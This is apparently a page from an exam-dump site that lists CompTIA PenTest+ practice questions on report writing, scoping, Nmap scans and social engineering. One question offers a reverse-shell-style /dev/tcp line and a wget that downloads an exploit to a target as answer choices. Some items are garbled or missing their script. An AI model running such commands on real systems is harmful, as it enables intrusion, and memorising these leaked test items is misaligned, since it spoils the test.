PT0-002 Exam Details

  • Exam Code
    :PT0-002
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :455 Q&As
  • Last Updated
    :May 31, 2026

CompTIA PT0-002 Online Questions & Answers

  • Question 151:

    A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

    Which of the following recommendations should the penetration tester include in the report?

    A. Add a dependency checker into the tool chain.
    B. Perform routine static and dynamic analysis of committed code.
    C. Validate API security settings before deployment.
    D. Perform fuzz testing of compiled binaries.

  • Question 152:

    An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems.

    Which of the following documents addresses this requirement?

    A. ROE
    B. NDA
    C. MOU
    D. SLA

  • Question 153:

    A penetration tester ran the following command on a staging server:

    python -m SimpleHTTPServer 9891

    Which of the following commands could be used to download a file named exploit to a target machine for execution?

    A. nc 10.10.51.50 9891 < exploit
    B. powershell -exec bypass -f \\10.10.51.50\9891
    C. bash -i >and /dev/tcp/10.10.51.50/9891 0and1>/exploit
    D. wget 10.10.51.50:9891/exploit

  • Question 154:

    Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

    A. The CVSS score of the finding
    B. The network location of the vulnerable device
    C. The vulnerability identifier
    D. The client acceptance form
    E. The name of the person who found the flaw
    F. The tool used to find the issue

  • Question 155:

    A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects.

    Which of the following Nmap commands should the tester use?

    A. ..nmap -sU -sV -T4 -F target.company.com
    B. ..nmap -sS -sV -F target.company.com
    C. ..nmap -sT -v -T5 target.company.com
    D. ..nmap -sX -sC target.company.com

  • Question 156:

    A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet."

    Which of the following audiences was this message intended?

    A. Systems administrators
    B. C-suite executives
    C. Data privacy ombudsman
    D. Regulatory officials

  • Question 157:

    A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet.

    Which of the following OSs would MOST likely return a packet of this type?

    A. Windows
    B. Apple
    C. Linux
    D. Android

  • Question 158:

    The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

    A. Statement of work
    B. Program scope
    C. Non-disclosure agreement
    D. Rules of engagement

  • Question 159:

    A penetration tester is testing a new API for the company's existing services and is preparing the following script:

    Which of the following would the test discover?

    A. Default web configurations
    B. Open web ports on a host
    C. Supported HTTP methods
    D. Listening web servers in a domain

  • Question 160:

    A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

    A. Dumpster diving
    B. Phishing
    C. Shoulder surfing
    D. Tailgating

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.